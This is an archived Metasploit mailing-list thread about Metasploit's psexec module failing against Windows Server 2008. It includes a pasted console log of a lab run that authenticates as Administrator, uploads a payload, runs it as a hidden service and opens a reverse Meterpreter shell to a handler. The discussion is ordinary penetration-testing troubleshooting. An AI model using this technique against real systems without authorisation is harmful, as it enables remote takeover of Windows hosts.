Metasploit mailing list archives
Re: Psexec on W2K8
From: Rob Fuller <mubix () room362 com>
Date: Fri, 20 May 2011 14:40:47 -0400
Any idea what GPO's are applied? Here is a session I just did against a Win2k8R2 DC: [*] Started reverse handler on 172.16.195.1:4444 [*] Connecting to the server... [*] Authenticating to 172.16.195.130:445|WORKGROUP as user 'Administrator'... [*] Uploading payload... [*] Created \iNvFKRbm.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.195.130[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.195.130[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (mtucOXte - "MsosjwWts")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \iNvFKRbm.exe... [*] Sending stage (749056 bytes) to 172.16.195.130 [*] Meterpreter session 1 opened (172.16.195.1:4444 -> 172.16.195.130:64809) at Fri May 20 14:25:59 -0400 2011 For some reason recently I've been having troubles with other payloads with Win7 and 2k8 but reverse_tcp works great. Can you post or send the log entry? (minus identifying pieces of course ;-) -- Rob Fuller | Mubix Certified Checkbox Unchecker Room362.com | Hak5.org On Fri, May 20, 2011 at 8:47 AM, Flippen, Benoit C <FlippenBC2 () state gov> wrote:
Anyone have any luck running psexec on a W2K8 box? Using admin credentials, it drops the file, creates the service, etc., but never gets the payload executed. On the remote system, the event logs show an error about interactive services not being allowed in W2K8. Any ideas? I'm sure it's something simple I'm missing. Benoit This email is UNCLASSIFIED _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Pass the hash query TAS (May 20)
- Re: Pass the hash query Jose Selvi (May 20)
- Psexec on W2K8 Flippen, Benoit C (May 20)
- Re: Psexec on W2K8 Duncan Alderson (May 20)
- Re: Psexec on W2K8 Rob Fuller (May 20)
- Re: Psexec on W2K8 Adrian Puente Z. (May 20)
- Psexec on W2K8 Flippen, Benoit C (May 20)
- Re: Pass the hash query Jose Selvi (May 20)